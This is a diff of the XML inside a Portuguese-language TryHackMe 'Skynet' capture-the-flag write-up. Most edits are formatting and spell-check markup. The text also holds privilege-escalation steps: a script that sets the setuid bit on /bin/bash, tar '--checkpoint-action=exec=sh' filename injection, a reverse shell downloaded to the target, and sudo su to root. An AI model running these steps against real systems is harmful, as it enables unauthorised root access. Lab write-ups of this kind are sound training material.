+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>html</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4520,6 +6358,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Comando usado: </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="hljs-builtin"/>
@@ -4531,6 +6370,7 @@
         </w:rPr>
         <w:t>printf</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -4550,7 +6390,103 @@
           <w:szCs w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
         </w:rPr>
-        <w:t>'#!/bin/bash\nchmod +s /bin/bash'</w:t>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>#!/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>bash</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>nchmod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> +s /bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>bash</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4606,6 +6542,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Comando usado: </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="hljs-builtin"/>
@@ -4617,6 +6554,7 @@
         </w:rPr>
         <w:t>echo</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -4668,7 +6606,79 @@
           <w:szCs w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
         </w:rPr>
-        <w:t>-checkpoint-action=exec=sh privesc</w:t>
+        <w:t>-checkpoint-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>action</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>exec</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> privesc</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4714,6 +6724,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="hljs-builtin"/>
@@ -4725,6 +6736,7 @@
         </w:rPr>
         <w:t>echo</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -4778,7 +6790,79 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Entre no diretório do miles novamente e execute o comando sudo –su para poder ter acesso root.</w:t>
+        <w:t xml:space="preserve">Entre no diretório do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>miles</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> novamente e execute o comando </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>su</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para poder ter acesso root.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4814,7 +6898,31 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sudo -l</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -l</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4850,8 +6958,45 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sudo su</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>su</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5019,7 +7164,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">O CTF em si não é difícil, o que o torna um pouco mais chato é a escalação de privilégio dele, porém nada impossível . </w:t>
+        <w:t xml:space="preserve">O CTF em si não é difícil, o que o torna um pouco mais chato é a escalação de privilégio dele, porém nada </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>impossível .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5913,6 +8076,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Fontepargpadro">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Tabelanormal">

--- a/TryHackMe/skynet/EIkebarbosa/writeup.docx
+++ b/TryHackMe/skynet/EIkebarbosa/writeup.docx
@@ -1046,7 +1046,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>DD/MM/AAAA</w:t>
+              <w:t>04/11/2024</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1069,7 +1069,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Aprovação</w:t>
+              <w:t>Refatoração</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1354,18 +1354,21 @@
               <w:color w:val="000000"/>
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
           <w:hyperlink w:anchor="_heading=h.2et92p0">
             <w:r>
               <w:rPr>
                 <w:color w:val="000000"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:t>What is the hidden directory?</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="000000"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1373,6 +1376,7 @@
           <w:r>
             <w:rPr>
               <w:color w:val="000000"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
             <w:t>6</w:t>
           </w:r>
@@ -1395,18 +1399,21 @@
               <w:color w:val="000000"/>
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
           <w:hyperlink w:anchor="_heading=h.tyjcwt">
             <w:r>
               <w:rPr>
                 <w:color w:val="000000"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:t>What is the vulnerability called when you can include a remote file for malicious purposes?</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="000000"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1414,6 +1421,7 @@
           <w:r>
             <w:rPr>
               <w:color w:val="000000"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
             <w:t>7</w:t>
           </w:r>
@@ -1434,18 +1442,21 @@
             <w:ind w:left="220"/>
             <w:rPr>
               <w:color w:val="000000"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
           <w:hyperlink w:anchor="_heading=h.3dy6vkm">
             <w:r>
               <w:rPr>
                 <w:color w:val="000000"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:t>What is the user flag:?</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="000000"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1453,6 +1464,7 @@
           <w:r>
             <w:rPr>
               <w:color w:val="000000"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
             <w:t>8</w:t>
           </w:r>
@@ -3229,25 +3241,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>email</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> do nosso alvo.</w:t>
+        <w:t xml:space="preserve"> o email do nosso alvo.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3632,25 +3626,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Com o acesso ao </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>email</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, e olhando eles, há um que chama muita atenção. Provavelmente sendo a senha do samba </w:t>
+        <w:t xml:space="preserve">Com o acesso ao email, e olhando eles, há um que chama muita atenção. Provavelmente sendo a senha do samba </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5003,31 +4979,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> –m </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>/</w:t>
+        <w:t xml:space="preserve"> –m php/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5267,31 +5219,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Primeiro é preciso ter uma reverse </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>shell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> baixada e </w:t>
+        <w:t xml:space="preserve">Primeiro é preciso ter uma reverse shell baixada e </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -5395,55 +5323,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> usando </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>python</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> para poder baixar a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>shell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dentro do servidor alvo.</w:t>
+        <w:t xml:space="preserve"> usando python para poder baixar a shell dentro do servidor alvo.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5480,31 +5360,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> a reverse </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>shell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> a reverse shell)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5552,31 +5408,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> para poder ouvir quando a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>shell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> for </w:t>
+        <w:t xml:space="preserve"> para poder ouvir quando a shell for </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -6308,31 +6140,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>html</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">/html </w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/TryHackMe/skynet/EIkebarbosa/writeup.docx
+++ b/TryHackMe/skynet/EIkebarbosa/writeup.docx
@@ -1841,23 +1841,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
